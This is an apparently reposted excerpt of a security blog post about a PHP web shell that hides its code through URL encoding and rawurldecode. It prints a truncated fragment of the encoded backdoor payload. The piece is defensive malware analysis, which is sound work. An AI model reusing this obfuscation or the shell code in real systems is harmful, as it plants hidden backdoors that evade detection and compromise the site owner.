Global CyberSecurity

Backdoor Obfuscation: tempnam & URL Encoding


Published on 09/28/2020 – Last Updated on 09/28/2020 by OTC

In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code.

During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.

This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i:

$i = rawurldecode(“%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm

Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog.

How to Detect and Improve Underperforming Content: A Guide to Optimization

Previous article

USS Ross conducts maritime drills with Polish frigate

Next article

You may also like


Comments are closed.